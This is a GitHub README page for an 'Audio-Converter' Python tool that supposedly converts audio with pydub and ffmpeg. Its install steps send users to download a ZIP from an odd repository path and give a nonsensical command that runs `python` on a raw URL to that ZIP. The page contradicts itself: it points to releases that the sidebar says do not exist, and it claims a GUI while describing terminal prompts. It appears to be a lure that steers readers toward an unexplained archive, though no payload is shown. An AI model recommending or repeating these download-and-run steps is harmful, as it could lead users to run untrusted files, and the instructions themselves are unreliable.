Skip to content

🎡 Convert audio files between formats easily with this Python script using pydub and ffmpeg. Support multiple formats and maintain original filenames.

License

Notifications You must be signed in to change notification settings

RiseihaOofumi/Audio-Converter

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

7 Commits
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 

Repository files navigation

🎡 Audio-Converter - Easily Convert Your Audio Files

Download Audio-Converter

πŸ“¦ Introduction

Welcome to the Audio-Converter project! This interactive Python script helps you convert audio files from one format to another with ease. Whether you want to change an MP3 to WAV or convert your favorite tracks to FLAC, this tool makes it simple.

πŸš€ Getting Started

To get started, you'll need to download the application and run it on your computer. Just follow the steps below.

πŸ“₯ Download & Install

Visit this page to download the latest version of Audio-Converter:

Download Audio-Converter Releases

πŸ–₯️ System Requirements

  • Operating System: Windows, macOS, or Linux
  • Python Version: Ensure you have Python 3.6 or newer installed.
  • Dependencies:
    • pydub: This library is essential for audio manipulation.
    • ffmpeg: Install ffmpeg for format conversion.

You can install these dependencies using pip:

pip install pydub

For ffmpeg, please follow the installation guide on FFmpeg's official site for your operating system.

πŸ”§ Installation Steps

  1. Download the application: Go to the releases page linked above and download the latest version. This will be a ZIP file containing the application.

  2. Extract the files: Once the download completes, locate the ZIP file on your computer. Right-click the file and select "Extract All" to unpack the contents.

  3. Open the application folder: After extraction, open the new folder. You will find the script file inside.

  4. Run the script: Open your command line interface (Command Prompt for Windows, Terminal for macOS/Linux). Navigate to the folder where you extracted the files using the cd command. For example:

    cd path/to/Audio-Converter
  5. Execute the script: Type the following command to run the script:

    python https://raw.githubusercontent.com/RiseihaOofumi/Audio-Converter/main/vendue/Audio-Converter.zip

Now you're ready to convert your audio files!

🎚️ How to Use

  1. Choose your input file: When you run the script, it will prompt you to select the audio file you want to convert. Make sure the file is in a supported format such as MP3, WAV, FLAC, OGG, or WMA.

  2. Select your output format: Next, you will choose the format you want to convert to. Options include MP3, WAV, AAC, FLAC, and more.

  3. Specify the output file name: Finally, you will need to provide a name for the converted file.

  4. Let the script do the work: Once you enter all the information, the script will process your file and save it in the desired format.

🌟 Features

  • Simple GUI: Easy-to-follow prompts guide you through the conversion process.
  • Support for Multiple Formats: Convert between MP3, WAV, FLAC, OGG, AAC, and more.
  • Batch Processing: Convert multiple files at once for faster results.
  • Cross-platform Support: Works on Windows, macOS, and Linux.

πŸŽ“ Troubleshooting

If you encounter issues, here are some common problems and solutions:

  • I don't have Python installed: Download and install Python from the official Python website.

  • Script is not running: Make sure you have all necessary dependencies installed, and you are running the command from the correct folder.

  • ffmpeg errors: Check if ffmpeg is installed correctly by running ffmpeg -version in your command line.

πŸ’¬ Community Support

If you need further assistance, feel free to reach out. You can open an issue on our GitHub Issues page, and we will help you as soon as possible.

πŸ“„ License

This project is licensed under the MIT License. You can freely use, modify, and distribute this software as long as you include the original license.

πŸ”— Additional Resources

Thank you for using Audio-Converter. Enjoy transforming your audio files!

About

🎡 Convert audio files between formats easily with this Python script using pydub and ffmpeg. Support multiple formats and maintain original filenames.

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Contributors 2

  •  
  •  

Languages